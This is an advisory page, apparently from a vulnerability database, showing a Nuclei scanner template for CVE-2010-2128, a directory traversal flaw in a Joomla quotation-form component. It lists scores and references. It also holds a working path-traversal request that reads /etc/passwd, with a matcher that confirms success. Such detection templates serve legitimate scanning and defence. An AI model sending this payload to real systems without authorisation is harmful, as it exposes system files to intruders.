Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2128
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
3

7.1 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.012 Low

EPSS

Percentile

85.3%

A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the view parameter to index.php.

id: CVE-2010-2128

info:
  name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12607
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2128
    - http://www.exploit-db.com/exploits/12607
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2128
    cwe-id: CWE-22
    epss-score: 0.01242
    epss-percentile: 0.84048
    cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: harmistechnology
    product: com_jequoteform
  tags: cve,cve2010,joomla,lfi,edb,harmistechnology

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e59aa470d7b6c5748d0e63fffbaa81a4831047b347273d58d3cb41ca77557c13022100ac7540e4284e4eab9793f192e0dea83d7673f2050021711441c420f87797fa77:922c64590222798bb761d5b6d8e72950

7.1 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.012 Low

EPSS

Percentile

85.3%

Related for NUCLEI:CVE-2010-2128